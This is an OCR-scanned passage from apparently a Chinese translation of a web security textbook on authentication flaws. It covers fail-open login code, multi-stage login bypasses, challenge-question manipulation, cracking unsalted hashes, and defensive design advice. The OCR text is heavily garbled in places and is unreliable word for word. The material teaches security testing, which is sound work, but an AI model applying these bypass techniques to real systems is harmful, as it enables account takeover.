尝试 预测 应 用 程序 发 送 给 最 近 与 后 续 用 户 的 激活 URL， 尝 斌 使 用 这 
些 URL 占 有 他 们 的 账户 。 

(3) 尝试 多 次 重复 使 用 同一 个 激活 URL， 看 看 应 用 程序 是 否 
允许 这 样 做 。 如 果 遭 到 拒绝 ， 党 试 在 重复 使 用 URL 之 前 锁定 目标 账 
户 ， 看 看 现在 这 种 方法 是 否 可 行 。 


6.3 ”验证 行 


由 于 在 执行 过 程 中 存在 错误 ， 即 使 精心 设计 的 验证 机 制 也 可 能 非 
营 不 安全 。 这 些 错 误 可 能 导致 信息 泄露 、 完 全 避 开 登录 ， 或 者 使 验证 
机 制 的 总 体 安全 弱化 。 与 保密 性 不 强 的 密码 和 可 被 亿 力 攻击 之 类 的 设 
计 缺 陷 相 比 ， 执 行 缺陷 往往 更 加 细微 ， 更 难以 发 现 。 由 于 大 量 威胁 模 
型 和 渗透 测试 可 能 已 经 发 现 了 最 为 注重 安全 的 应 用 程序 中 的 任何 明显 
的 执行 缺陷 ， 针 对 这 类 缺陷 实施 攻击 通 单 会 取得 更 大 的 成 末 。 我 们 曾 
在 某 大 型 银行 所 采用 的 Web 应 用 程序 中 发 现 以 下 所 述 的 执行 缺陷 。 


6.3.1 登 


故障 开放 逻辑 是 一 种 逻辑 缺陷 〈 将 在 第 11 章 详细 描述 ) ， 如 采 验 
证 机 制 中 出 现 这 种 缺陷 ， 就 会 造成 十 分 严重 的 后 果 。 

下 面 是 一 个 精心 设计 的 故障 开放 登录 机 制 实例 。 如 采 由 于 某 种 原 
办， 调用 db.getUser () 产生 异常 (例如 ， 因 为 用 户 的 请 求 中 没有 用 户 
名 或 密码 参数 而 出 现 空 指针 异常 ) ， 用 户 仍然 可 以 成 功 登 录 。 虽 然 产 
生 的 会 话 可 能 并 不 属于 某 个 特殊 的 用 户 ， 因 此 无 法 执行 其 全 部 功能 ， 
但 攻击 者 仍然 可 以 通过 这 种 方法 访问 一 些 敏感 数据 或 功能 。 


public Response checkLogin(Session session) { 


try { 
String uname = session.getParameter ("username"); 
String passwd = session.getParameter ("password"); 


User user = db.getUser(uname, passwd); 

if (user == null) { 
/1 无 将 证 书 
session.setMessage("Login failed. "); 
return doLogin (session); 


} 


catch (Exception e) {} 


// 有 效用 户 
session.setMessage("Login successful. "); 


return doMainMenu(session); 
} 


实际 上 ， 我 们 不 能 指望 这 样 的 代码 通过 即使 是 最 简单 的 安全 审 
查 。 但 是 ， 在 更 复杂 的 机 制 中 很 可 能 存在 概念 相同 的 缺陷 。 这 些 机 制 
会 产生 大 量 分 层 方式 调用 ， 可 能 会 出 现 许多 潜在 的 错误 并 在 不 同 的 位 
eee 其 中 更 复杂 的 确认 还 辑 可 能 需要 维护 重要 的 登录 
进展 状态 。 


渗透 测试 步骤 


(1) 使 用 控制 的 一 个 账户 执行 一 次 完整 、 有 效 的 登录 。 使 用 
拦截 代理 服务 絮 记 杂 提 交 的 每 一 份 数 据 、 收 到 的 每 一 个 啊 应 。 
(2) 多 次 重复 登录 过 程 ， 以 非常 规 方式 修改 提交 的 数据 。 例 
如 ， 对 于 客户 端 传送 的 每 个 请 求 参 数 或 cookie: 
(a) Heat hE FAT AE 
(b) 完全 删除 名 / 值 对 ; 
(c) $ 失实 党 长 和 党 的 人 
(d) 提交 字符 第 代替 数字 或 相反 ， 
©) 以 条 同和 和 不同 的 信 多 次 提交 同一 个 数据 项 。 
(3) 仔细 检查 应 用 程序 对 提交 的 每 个 畸形 请 求 的 啊 应 ， 确 定 
任何 不 同 于 基本 情况 的 差异 。 
(4) 根据 这 些 观察 结果 调整 测试 过 程 。 如 果菜 个 修改 造成 行 
为 改变 ， 设 法 将 这 个 修改 与 其 他 更 改组 合 在 一 起 ， 使 应 用 程序 的 逻 
辑 达到 最 大 限度 。 


尝试 访问 


http://mdsec.net/auth/300/ 


6.3.2 登录 机 制 中 的 缺 
一 些 应 用 程序 使 用 精心 设计 的 多 阶段 登录 机 制 ， 例 如 : 
口 输入 用 户 名 和 密码 ; 


口 响应 一 个 质询 ， 答 案 是 PIN 中 的 特殊 数字 或 一 个 值得 纪念 的 词 ; 

口 提 交 在 不 断 变 化 的 物理 令 牌 上 显示 的 某 个 值 。 

多 阶段 登录 机 制 让 在 提高 基于 用 户 名 和 密码 的 简单 登录 模型 的 安 
全 性 。 通 常 ， 多 阶段 登录 机 制 衣 先 要 求 用 户 通过 用 户 名 或 类 似 数 据 项 
确认 目 己 的 映 份 ， 随 后 ， 登 录 阶 段 再 执行 各 种 验证 检查 。 这 种 机 制 常 
常 存在 安全 漏洞 ， 特 别 是 各 种 逻辑 缺陷 (请 参阅 第 11 章 了 解 相关 内 
容 ) 。 


号 错误 观点 ”人们 常常 认为 多 阶段 登录 机 制 比 标准 的 用 户 名 / 
密码 验证 的 安全 漏洞 更 少 。 这 种 看 法 钙 错 误 的 。 执 行 多 次 验证 


检查 可 能 会 显 闭 提高 登录 机 制 的 安全 性 。 但 相应 地 ， 这 个 过 程 
也 存在 更 多 的 执行 缺陷 。 如 果 一 个 多 阶段 登录 机 制 存在 多 个 执 
行 缺 陷 ， 它 甚至 还 没有 基于 用 户 名 和 密码 的 正 滑 登录 安全 。 


在 执行 过 程 中 ， 一 些 多 阶段 登录 机 制 对 用 户 与 早先 阶段 的 交互 做 
出 潜在 不 安全 的 假设 ， 如 下 所 示 。 

口 应 用 程序 可 能 认为 访问 第 三 阶段 的 用 户 已 经 完成 第 一 、 二 阶段 
的 验证 。 因 此 ， 它 可 能 允许 直接 由 第 一 阶段 进入 第 三 阶段 并 且 提 供 正 
确证 书 的 攻击 考 通 过 验证 ， 使 仅 拥 有 部 分 正常 登录 所 需 的 各 种 证 书 的 
攻击 者 能 够 成 功 登 录 。 


口 应 用 程序 可 能 会 信任 由 第 二 阶段 处 理 的 一 些 数 据 ， 因 为 这 些 数 
据 已 经 在 第 一 阶段 得 到 确认 。 但 十， 攻击 者 能 够 在 第 二 阶段 操控 这 些 
数据 ， 提 供 一 个 不 同 于 第 一 阶段 的 值 。 例 如 ， 在 第 一 阶段 ， 应 用 程序 
会 判定 用 户 的 账户 是 否 已 经 过 期 、 被 锁定 或 者 属于 管理 用 户 ， 或 者 是 
个 需要 完成 第 二 阶段 以 外 的 其 他 登录 阶段 。 如 采 攻 击 者 能 在 不 同 登录 
阶段 的 转换 过 程 中 干扰 这 些 标 记 ， 他 们 束 可 以 更 改 应 用 程序 的 行为 ， 
让 他 们 只 需 部 分 证 书 即 可 通过 验证 ， 或 者 提升 其 权限 。 

口 应 用 程序 可 能 认为 每 个 阶段 的 用 户 吴 份 不 会 发 生变 化 ， 因 此 ， 
它 并 不 在 每 个 阶段 明确 确认 用 户 身 份 。 例 如 ， 第 一 阶段 可 能 需要 提交 
一 个 有 效 的 用 户 名 和 和 密码， 第 二 阶段 需要 重新 提交 用 户 名 (此 时 保存 
在 隐藏 表单 字段 中 ) 和 不 断 变化 的 物理 令 牌 上 的 一 个 值 。 如 果 攻 击 者 
在 每 个 阶段 握 交 有 效 的 数据 对 ， 但 这 些 数 据 属于 两 个 不 同 的 用 户 ， 那 
么 应 用 程序 可 能 会 允许 该 用 户 通过 验证 ， 认 为 他 是 两 名 用 户 中 的 任意 
一 名 用 户 。 这 吏 允 许 拥 有 目 己 物理 令 牌 并 发 现 其 他 用 户 密码 的 攻击 着 
能 够 以 该 用 户 的 身份 登录 〈 反 之 亦 然 ) 。 虽 然 不 对 其 他 信息 加 以 利 
用 ， 攻 击 者 无 法 完全 攻破 登录 机 制 ， 但 它 的 总 体 安全 状态 已 严重 削 
0 
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渗透 测试 步骤 


(1) 使 用 控制 的 一 个 账户 执行 一 次 完整 、 有 效 的 登录 。 使 用 
拦截 代理 服务 器 记录 回应 用 程序 提交 的 每 一 份 数 据 。 

(2) 确定 各 个 不 同 登 录 阶 段 以 及 在 每 个 阶段 收集 到 的 数据 。 
确定 是 否 不 止 一 次 收 到 某 条 信息 ， 或 者 是 否 有 信息 被 返回 给 客户 
端 ， 并 通过 隐藏 表单 字段 、cookie 或 者 预先 设置 的 URL 参 数 重新 提 
交 《请 参阅 第 5 章 了 解 相 关内 容 ) 。 

(3) 使 用 各 种 畸形 请 求 多 次 重复 登录 过 程 : 

(a) 和 演 试 按 不 同 的 顺序 完成 登录 步 又 ; 
尝试 直接 进入 任何 特定 的 阶段 ， 从 那里 继续 登录 ; 
兰 试 省 略 每 个 阶段 并 从 下 一 阶段 继续 登录 ; 
运用 想象 力 ， 想 出 其 他 开发 者 无 法 预料 的 方式 访问 

不 同 的 登录 阶段 。 

(4) 如 果 有 数据 不 止 提交 一 次 ， 淮 试 在 另 一 个 阶段 提交 一 个 
不 同 的 值 ， 看 看 是 否 仍 然 能 够 成 功 登 录 。 有 些 提交 数据 可 能 是 多 余 
的 ， 实 际 上 并 不 由 应 用 程序 处 理 。 有 些 数 据 在 某 个 阶段 得 到 确认 ， 
随后 束 倍 应 用 程序 所 信任 。 在 这 种 情况 下 ， 壬 试 在 一 个 阶段 提供 一 
名 用 户 的 证 书 ， 然 后 在 下 一 阶段 转换 成 由 男 一 名 用 户 进 行 验证 。 应 
用 程序 可 能 在 儿 个 阶段 都 对 同一 个 数据 进行 确认 ， 但 执行 不 同 的 检 
查 。 在 这 种 情况 下 ， 演 试 在 第 一 个 阶段 提供 (例如 ) 一 名 用 户 的 用 
己 名 和 和 密码， 然后 在 第 二 个 阶段 提供 男 一 名 用 户 的 用 户 名 和 PIN 写 
码 。 


(5) 特别 注意 任何 通过 客户 端 传送 、 并 不 由 用 户 直接 输入 的 
数据 。 应 用 程序 可 能 使 用 它们 保存 登录 进展 状态 信息 ， 并 且 信 任 这 
些 数据 。 例 如 ， 如 果 第 三 个 阶段 的 请 求 中 包含 参数 
stage2complete=true， 那 么 攻击 者 束 可 以 通过 设置 这 个 值 直接 进入 第 
三 个 阶段 。 壬 斌 修改 应 用 程序 提交 的 值 ， 确 定 是 否 可 以 使 用 这 种 方 
法 进入 或 省 略 登 录 阶 段 。 


尝试 访问 


http://mdsec.net/auth/195/ 


http://mdsec.net/auth/199/ 
http://mdsec.net/auth/203/ 
http://mdsec.net/auth/206/ 
http://mdsec.net/auth/211/ 


一 些 登 录 机 制 在 其 中 一 个 登录 阶段 提出 一 个 随机 变化 的 问题 。 例 
如 ， 提 有 交 用 户 名 和 和 密码 后 ， 应 用 程序 会 同 用 户 提 出 许多 “机 密 ” 问 题 中 
的 一 个 《关于 用 户 母亲 的 娘家 姓 、 出 生地 、 人 小 学 名 称 等 ) ， 或 者 要 求 
其 提交 一 个 机 密 短 语 中 的 两 个 随机 字母 。 采 用 这 种 做 法 的 基本 原理 在 
F: 即使 攻击 者 截获 了 用 户 在 某 个 时 候 输 入 的 全 部 信息 ， 他 也 无 法 在 
其 他 时 刻 作为 该 用 户 登 录 ， 因 为 这 时 应 用 程序 将 提出 不 同 的 问题 。 
在 某 些 执 行 过 程 中 ， 这 种 功能 会 划 到 破坏 ， 因 而 无 法 实现 其 目 

口 应 用 程序 可 能 会 提出 一 个 随机 选择 的 问题 ， 把 有 关 问 题 的 细 市 
保存 在 隐藏 的 HTML 表 单字 段 中 ， 而 不 是 服务 大 上 “。 随 后 用 户 提交 该 
问题 及 其 和 葵 案 。 这 样 ， 攻 击 者 束 能 够 选择 回答 哪个 问题 ， 人 允许 他 们 截 
获 用 户 在 某 个 时 候 的 输入 后 ， 重 复 使 用 截获 的 信息 进行 登录 。 

口 应 用 程序 可 能 会 对 每 个 登录 笑 试 提出 一 个 随机 选择 的 问题 ,但 
如 果 某 个 用 户 无 法 回答 该 问题 ， 它 并 不 记 住 向 该 用 尸 提 出 了 什么 问 
题 。 如 果 该 用 户 稍 后 又 提交 一 次 登录 壬 试 ， 应 用 程序 义 生 成 男 一 个 随 
机 问题 。 这 人 允许 攻击 着 过 历 所 有 问题 ， 直 到 收 到 他 们 知道 答案 的 那个 
问题 ， 从 而 利用 在 某 个 时 候 截 获 的 用 户 输入 重复 进行 登录 。 


T 注解 上 面 的 第 二 种 情况 确实 相当 微妙 ， 因 此 ， 许 多 现实 
中 的 应 用 程序 都 易于 受到 攻击 。 初 看 上 去 ， 要 求 用 户 回答 一 个 值得 


纪念 的 词 中 的 两 个 字母 的 应 用 程序 似乎 能 够 正常 运 园 ， 增 强 登录 机 
制 的 安全 。 但 是 ， 如 采 每 次 在 通过 前 一 个 验证 阶段 后 随机 选择 两 个 


字母 ， 那 么 截获 用 户 在 某 个 时 候 的 登录 信息 的 攻击 者 只 需 重 复 进 入 


这 个 验证 阶段 ， 直 到 应 用 程序 要 求 提 交 他 知道 的 两 个 字母 为 止 ， 这 
样 做 也 不 存在 任何 账户 锁定 风险 。 


渗透 测试 步骤 


(1) 如 果 一 个 登录 阶段 使 用 一 个 随机 变化 的 问题 ， 确 定 问题 


本 身 是 否 和 回答 一 起 提交 。 如 果 是 这 样 ， 改 变 这 个 问题 并 提交 正确 
答案 ， 看 看 十 否 仍 然 能 够 成 功 登 录 。 

(2) 如 果 应 用 程序 并 不 允许 攻击 者 提交 任意 问题 和 答案 ， 用 
同一 个 账户 进行 部 分 登录 ， 每 次 进行 到 出 现 不 同 的 问题 为 止 。 如 采 
每 次 都 出 现 不同 的 问题 ， 那 么 攻击 者 仍然 能 够 选择 回答 哪个 问题 。 


尝试 访问 


http://mdsec.net/auth/178/ 
http://mdsec.net/auth/182/ 


T 注解 在 一 些 登 录 组 件 随机 变化 的 应 用 程序 中 ， 应 用 程序 


在 一 个 阶段 收集 用 户 的 全 部 证 书 。 例 如 ， 主 登录 页 面 中 可 能 显示 一 
个 表单 ， 其 中 包含 用 户 名 、 和 密码 和 一 个 机 密 问题 字段 ， 且 当 每 次 加 
载 登录 页 面 时 ， 机 密 问 题 都 会 发 生 改 变 。 在 这 种 情况 下 ， 机 密 问 题 
的 随机 性 根本 无 法 阻止 已 经 截获 一 名 用 户 在 某 个 时 候 的 输入 信息 的 
攻击 者 重新 传送 有 效 的 登录 请 求 ， 也 无 法 修改 登录 过 程 以 实现 这 种 
目的 ， 因 为 攻击 者 只 需 重复 加 载 登 录 页 面 ， 直 到 找到 他 知道 答案 的 
问题 。 在 另 一 种 类 似 的 情况 下 ， 应 用 程序 可 能 会 设置 一 个 持久 性 
cookie, “确保 ” 回 特 定 用 户 提出 相同 的 问题 ， 直 到 该 用 户 正 确 回答 
这 个 问题 。 当 然 ， 攻 击 者 只 需 修改 或 删除 这 个 cookie 束 能 够 轻易 避 
开 这 种 防御 措施 。 


6.3.3 “不 安全 的 证 书 存储 


如 果 应 用 程序 以 不 安全 的 方式 存储 登录 证 书 ， 那 么 ， 即 使 验证 过 
程 本 身 并 不 存在 缺陷 ， 登 录 机 制 的 安全 也 会 被 削弱 。 

Web 应 用 程序 常常 以 危险 的 方式 将 用 户 证 书 存储 在 数据 库 中 ， 这 
包括 以 明文 形式 存储 密码 。 但 是 ， 即 使 使 用 MD5 或 SHA-1 等 标准 算法 
对 密码 进行 散 列 处 理 ， 攻 击 者 仍然 可 以 在 预先 计算 的 散 列 值 数据 库 中 
查找 观察 到 的 散 列 。 因 为 应 用 程序 使 用 的 数据 库 账 户 必 须 能 够 随时 读 / 
写 这 些 证 书 ， 攻 击 者 可 以 利用 应 用 程序 中 的 许多 其 他 漏洞 访问 这 些 证 
书 ， 例 如 ， 命 令 、SQL 注 入 漏洞 (BH BOR) 或 访问 控制 漏洞 (参阅 
第 8 章 ) 。 


尝试 访问 


一 些 在 线 数据 库 的 常见 散 列 画 数 可 从 以 下 网 址 查看 
http://passcracking.com/index.php 
http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/script- 

hash-md5.php 


渗透 测试 步骤 


(1) 分 析 应 用 程序 中 所 有 与 验证 有 关 的 功能 以 及 任何 与 用 户 
维护 有 天 的 功能 。 如 采 发 现任 何 回 客户 端 返回 用 户 密 码 的 情况 ， 即 
表明 应 用 程序 并 未 以 安全 的 方式 保存 密码 ， 或 者 密码 以 明文 方式 呈 
现 ， 或 应 用 程序 使 用 了 可 还 原 加 密 形 式 保存 密码 。 

(2) 如 果 发 现 应 用 程序 中 存在 任何 一 种 任意 命令 或 查询 执行 


漏洞 ， 设 法 确定 应 用 程序 将 用 户 证 书 保存 在 数据 库 或 文件 系统 的 什 


LAE ° 
z (a) 找到 这 些 位 置 ， 弄 清 应 用 程序 是 否 以 非 加 密 形式 保 
FEET o 
(b) 如 果 以 散 列 形式 存储 密码 ， 则 应 检查 表明 账户 分 配 
有 常用 或 默认 密码 ， 以 及 散 列 并 未 经 过 “加 salt" 处 理 的 非 唯一 


值 。 
(c) 如 果 使 用 标准 算法 以 “不 加 salt 的 散 列 ”形式 存储 密 
码 ， 则 应 查询 在 线 散 列 数据 库 ， 以 确定 对 应 的 明文 密码 值 。 


0.4 » 证 : oo 


执行 安全 的 验证 解决 方案 需要 同时 满足 几 个 关键 安全 目标 ， 许 多 
时 候 也 需要 牺牲 其 他 目标 ， 如 功能 、 易 用 性 和 总 成 本 。 有 些 时 候 , “更 
加 ”安全 实际 上 可 能 适得其反 。 例 如 ， 强 坦 用 户 设 置 超 长 密码 并 频繁 修 
改 密码 往往 促使 他 们 将 密码 记录 下 来 (因而 导致 密码 泄露 。 

鉴于 验证 漏洞 的 多 样 性 ， 以 及 应 用 程序 需要 采取 非常 复 灯 的 防御 
措施 以 减轻 所 有 这 些 漏洞 的 危害 ， 许 多 应 用 程序 设计 者 与 开发 者 选择 
接受 某 些 威胁 ， 以 集中 精力 阻止 最 严重 的 攻击 。 在 实现 这 种 防御 平衡 
的 过 程 中 ， 我 们 需要 考虑 以 下 因素 。 

口 应 用 程序 所 提供 功能 的 安全 程度 。 

口 用 户 对 不 同类 型 的 验证 控制 的 容忍 和 接受 程度 。 

口 文 持 一 个 不 够 友好 的 用 户 界 面 系统 所 需 的 成 本 。 

口 苑 争 性 解决 方案 相对 于 应 用 程序 可 能 产生 的 收入 方面 的 金融 成 
本 或 它 所 保护 资产 的 价值 。 

我 们 将 在 本 市 说 明 阻 止 各 种 针对 验证 机 制 攻击 的 最 有 效 方法 ， 然 
后 让 读者 目 行 决定 哪 种 防御 措施 最 适合 他 们 的 特殊 需求 。 


6.4.1 使 用 可 靠 的 证 书 


口 应 强制 执行 适当 的 最 小 密码 强度 要 求 。 这 些 要 求 包括 : 最 小 密 
码 长 度 ， 使 用 字母 、 数 字 和 排版 字符 ， 同 时 使 用 大 、 人 小 写字 符 ， 避 锡 
使 用 字典 中 的 单词 、 名 称 和 其 他 常见 密码 ， 避 免 以 用 记名 为 密码 ， 避 
免 使 用 和 以 前 的 密码 相似 或 完全 相同 的 密码 。 和 大 多 数 安全 措施 一 
样 ， 不 同 的 密码 强度 要 求 适 用 于 不 同类 型 的 用 户 。 

口 应 使 用 唯一 的 用 户 名 。 

口 系统 生成 的 任何 用 户 名 和 密码 应 具有 足够 的 随机 性 ， 其 中 不 包 
0 
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口 允许 用 尸 设 置 足够 强大 的 密码 。 例 如 ， 应 允许 其 设置 长 密码 ， 
允许 在 密码 中 使 用 各 种 类 型 的 字符 。 


6.4.2 ”安全 处 理 证 书 


口 应 以 不 会 造成 非 授 权 泄露 的 方式 创建 、 保 存 和 传送 所 有 证 书 。 

口 应 使 用 公认 的 加 密 技 术 (如 SSL) 保护 客户 端 与 服务 器 间 的 所 
有 通信 。 既 无 必要 也 不 需要 使 用 定制 解决 方案 保护 传输 中 的 数据 。 

口 如 果 认 为 最 好 在 应 用 程序 的 不 需 验 证 的 区 域 使 用 HTTP， 必 须 保 
证 使 用 HTTPS 加 载 登录 表单 ， 而 不 是 在 提交 登录 信息 时 才 转 换 到 
HTTPS ° 

口 只 能 使 用 POST 请 求 同 服 务 絮 传输 证 书 。 绝 不 能 将 证 书 放 在 URL 
参数 或 cookie 中 (即使 临时 放置 也 不 行 ) 。 绝 不 能 将 证 书 返 还 给 客户 
端 ， 即 使 是 通过 重 定 癌 参 数 传送 也 不 行 。 

口 所 有 服务 器 一 客户 端 应 用 程序 组 件 应 这 样 你 存 证 书 : 即使 攻击 
者 能 够 访问 应 用 程序 数据 库 中 存储 的 所 有 相关 数据 ， 他 们 也 无 法 轻易 
恢复 证 书 的 原始 值 。 达 到 这 种 目的 最 常用 的 方法 是 使 用 强大 的 散 列 函 
数 (如 至 本 书 截 稿 时 的 SHA-256 画 数 ) ， 并 对 其 进行 “加 Salt 处理? 以降 
低 预 先 计 算 的 离线 攻击 (precomputed offline attack) 的 危害 。 该 salt 应 
特定 于 拥有 密码 的 账户 ， 以 防止 攻击 者 重播 或 替换 散 列 值 。 

口 一 般 来 说 ， 客 户 端 * 记 住 我 ?功能 应 仅 记 忆 如 用 户 名 之 类 的 非 保 
密 数 据 。 在 安全 要 求 较 低 的 应 用 程序 中 ， 可 适当 人 允许 用 户 选 择 一 种 工 
具 来 记 住 密码 。 在 这 种 情况 下 ， 客 户 端 不 应 保存 明文 证 书 〈 应 使 用 密 
钥 以 可 逆 加 密 的 形式 保存 密码 ， 且 只 有 服务 器 知道 这 个 密 钥 ) ; FN 
用 户 警 告 直接 访问 他 们 的 计算 机 或 远程 攻破 他 们 计算 机 的 攻击 者 可 能 
造成 的 风险 。 应 特别 注意 消除 应 用 程序 中 存在 的 可 用 于 盗窃 其 中 保存 
的 证 书 的 跨 站 点 脚本 漏洞 “请 参阅 第 12 草 了 解 相 关内 容 ) 。 

应 使 用 一 种 密码 修改 工具 〈 请 参阅 6.4.6 了 ) ， 要 求 用 户 定期 修 
改 其 密码 。 

口 如 有 果 以 非 正 常 交 互 的 形式 辣 新 建 账户 分 配 证 书 ， 应 以 尽 可 能 安 
全 的 形式 传送 证 书 ， 并 设置 时 间 限 制 ， 要 求 用 户 在 第 一 次 登录 时 更 改 
证 书 ， 并 告诉 用 户 在 初次 使 用 后 销毁 通信 渠道 。 

口 应 考虑 在 适当 的 地 方 使 用 下 拉 荣 单 而 非 文 本 字段 截取 用 户 的 一 
些 登 录 信 息 (如 值得 纪念 的 词 中 的 一 个 字母 ) 。 这 样 做 可 防止 安装 在 
用 户 计算 机 上 的 键盘 记录 器 截获 他 们 提交 的 所 有 数据 。 (但 是 ， 还 请 
注意 ， 简 单 的 键盘 记录 器 只 是 攻击 者 用 于 截获 用 户 输 入 的 一 种 手段 。 
如 果 攻 击 者 已 经 攻破 用 户 的 计算 机 ， 那 么 从 理论 上 讲 ， 他 束 能 够 记录 
计算 机 上 发 生 的 各 种 类 型 的 事件 ， 包 括 鼠 标 活 动 、 通 过 HTTPS 提 区 的 
表单 以 及 截屏 。) 


6.4.3 ”正确 确认 证 书 


口 应 确认 完整 的 密码 。 也 就 是 说 ， 区 分 大 小 写 ， 不 过 滤 或 修改 任 
何 字符 ， 也 不 截 短 密码 。 

口 应 用 程序 应 在 登录 处 理 过 程 中 主动 防御 无 法 预料 的 事件 。 例 
如 ， 根 据 所 使 用 的 开发 语言 ， 应 用 程序 应 对 所 有 API 调 用 使 用 “全 捕 
获 ” 型 异常 处 理 程序 (catch-all exception handler) 。 这 些 程序 应 明确 删 
除 用 于 控制 登录 状态 的 所 有 会 话 和 方法 内 部 数据 (method-local 
data) ， 并 使 当前 会 话 完 全 失效 。 因 此 ， 即 使 攻击 者 以 某 种 方式 避 开 
验证 ， 也 会 被 服务 器 强制 退出 。 

口 应 对 验证 逻辑 的 仿 代 码 和 实际 的 应 用 程序 源 代码 进行 仔细 的 代 
码 审 查 ， 以 确定 故障 开放 条 件 之 类 的 逻辑 错误 。 

口 如 采 应 用 程序 执行 支持 用 户 伪 装 功能 ， 应 严格 控制 这 种 功能 ， 
以 防止 攻击 者 滥用 它 获得 未 授权 访问 。 鉴 于 这 种 功能 的 危险 程度 ， 通 
常 有 必要 从 面向 公众 的 应 用 程序 中 彻 故 删 除 该 功能 ， 只 对 内 部 管理 用 
户 开 放 该 功能 ， 而 且 他 们 使 用 伪装 也 应 接受 严格 控制 与 审核 。 

口 应 对 多 阶段 登录 进行 严格 控制 ， 以 防止 攻击 者 破坏 登录 阶段 之 
间 的 转换 与 天 系 。 

”有 天 登录 阶段 进展 和 前 面 验 证 任务 结果 的 所 有 数据 应 休 
eee ere 
读 取 。 

e 禁止 用 户 多 次 提交 一 项 登录 信息 ; 禁 目 用户 修改 已 经 被 
收集 或 确认 的 数据 。 如 采 需 要 在 几 个 阶段 使 用 同一 个 数 
据 (如 用 户 名 ) ， 应 在 第 一 次 收集 时 将 该 数据 保存 在 会 
话 变 量 中 ， 随 后 从 此 处 引用 该 数据 。 

me ”在 每 一 个 登录 阶段 ， 应 首先 核实 前 面 的 阶段 均 已 顺利 完 


流 针对 每 个 阶段 发 动 攻 击 ) 的 信息 ， 即 使 用 户 无 法 正确 
完成 前 面 的 阶段 、 即 使 最 初 的 用 户 名 无 效 ， 应 用 程序 也 
应 总 是 处 理 完 所 有 的 登录 阶段 。 在 处 理 完 所 有 的 登录 阶 
段 后 ， 应 用 程序 应 在 最 后 阶段 结束 时 呈现 一 条 和 彰 规 “登录 
失败 ? 消 思 ， 并 且 不 提供 失败 位 置 的 任何 信息 。 


口 如 来 在 登录 过 程 中 需要 回答 一 个 随机 变化 的 问题 ， 请 确 你 攻击 
者 无 法 选择 回答 问题 。 

四 总 征 采 用 一 个 多 阶段 登 孙 过程 ， 在 第 一 阶段 确认 用 户 刁 

份 ， 并 在 后 面 的 阶段 回 用 户 提出 随机 变化 的 问题 。 
四。 如 有 条 已 问 茶 一 用 户 提出 一 个 特定 的 问题 ， 将 该 问题 保存 
在 永久 性 用 户 资 料 中 ， 确 保 每 次 该 用 户 竹 试 登录 时 间 其 

提出 相同 的 问题 ， 直 到 该 用 户 正确 回答 这 个 问题 。 
”如 有 果 问 某 个 用 户 提 出 一 个 随机 变化 的 质询 ， 将 提出 的 问 
题 保 存在 服务 硕 端 会 话 杰 量 而 非 HTML 表 单 的 隐藏 字段 

中 ， 并 根据 保存 的 问题 核实 用 户 随后 提供 的 答案 。 


T 注解 以 上 详细 介绍 了 设计 一 个 安全 验证 机 制 的 微妙 之 


处 。 提 出 一 个 随机 变化 的 问题 时 稍 不 谍 慎 就 可 能 给 攻击 者 提供 用 户 
名 枚 举 的 机 会 。 例 如 ， 为 防止 攻击 者 选择 回答 他 知道 答案 的 问题 ， 
应 用 程序 可 能 会 将 该 用 户 提出 的 最 后 一 个 问题 保存 在 用 户 资 料 中 ， 
并 不 断 提 出 该 问题 直到 得 到 正确 答案 。 这 样 ， 使 用 相同 用 户 名 多 次 
登 孙 的 攻击 者 吏 会 遇 到 相同 的 问题 。 但 是 ， 如 采 攻 击 者 使 用 一 个 无 
效 的 用 户 名 进行 相同 的 操作 ， 应 用 程序 处 理 的 方法 可 能 会 有 所 不 
同 : 由 于 没有 与 无 效用 户 名 有 关 的 用 户 和 资料 ， 也 没有 问题 被 保存 起 
来 ， 因 此 ， 应 用 程序 将 提出 一 个 不 同 的 问题 。 攻 击 者 可 以 利用 这 种 
在 多 次 登录 笑 试 中 表现 出 来 的 行为 差异 ， 推 断 某 个 特殊 用 户 名 的 有 
效 性 。 在 一 次 目 定 义 攻击 中 ， 攻 击 者 能 够 迅速 获得 大 量 用 户 名 。 
如 采 应 用 程序 硕 望 防御 这 种 可 能 性 ， 它 必须 采取 一 些 预 防 措 
施 。 如 末 收 到 使 用 无 效用 户 名 发 起 的 登录 竹 试 ， 应 用 程序 必须 在 某 
个 位 置 记录 同 这 个 无 效用 户 名 提出 的 随机 问题 ， 并 确保 随后 使 用 这 
个 用 户 名 登录 都 会 遇 到 相同 的 问题 。 更 进一步 ， 应 用 程序 可 害 期 更 
换 到 一 个 不 同 的 问题 ， 模 拟 不 存在 的 用 户 已 作为 正常 用 户 登 录 ， 导 
致 提出 的 下 一 个 问题 出 现 变 化 。 但 是 ， 从 某 种 意义 上 说 ， 应 用 程序 
计 者 必须 做 出 让 步 ， 因 为 挫败 意志 如 此 坚定 的 攻击 者 几乎 是 不 可 


6.4.4 ”防止 信息 泄露 


口 应 用 程序 使 用 的 各 种 验证 机 制 不 应 通过 公开 的 消 轧 ， 或 者 通过 
从 应 用 程序 的 其 他 行为 进行 推 朵 ， 来 揭示 关于 验证 参数 的 任何 信息 。 
攻击 者 应 无 法 判定 是 提交 的 哪个 数据 造成 了 问题 。 

口 应 由 单独 一 个 代码 组 件 使 用 一 条 常规 消 轧 负责 啊 应 所 有 失败 的 
登录 壬 试 。 这 样 做 可 避免 由 不 同 代 码 路 人 径 返回 的 本 应 不 包公 大 量 信 息 
的 消 轧 ， 因 为 消 恩 排版 方面 的 差异 、 不 同 的 HTTP 状 态 码 、 其 他 隐藏 在 
HTML 中 的 信息 等 内 容 而 让 攻击 者 看 出 差别 ， 从 而 产生 一 个 细微 的 沁 
洞 。 

口 如 有 果 应 用 程序 实行 某 种 账户 锁定 以 防止 蛋 力 攻击 《如 6.4.5 世 所 
述 ) ， 应 小 心 处 理 以 防 造 成 信息 泄露 。 例 如 ， 如 果 应 用 程序 透露 ， 由 
于 7 次 失败 登录 ， 已 将 某 个 特殊 的 账户 冻结 Xx 分 钟 ， 这 种 行为 束 可 被 用 
于 枚 举 有 效 的 用 户 名 。 男 外 ， 明 确 公开 账 户 锁定 策略 标准 也 使 攻击 者 
能 够 调整 任何 登录 笑 试 ， 不 顾 锁 定 政 策 继续 猜测 密码 。 为 避免 用 户 名 
枚 举 ， 如 果 从 相同 济 吕 器 发 出 一 系列 失败 的 登录 竹 试 ， 应 用 程序 应 通 
过 一 条 和 常规 消息 提出 警告 : 如 打出 现 多 次 登录 失败 ， 账 户 将 被 头 结 ， 
并 建议 用 户 稍 后 再 试 。 可 通过 使 用 一 个 cookie 或 隐藏 字段 追踪 来 目 相 
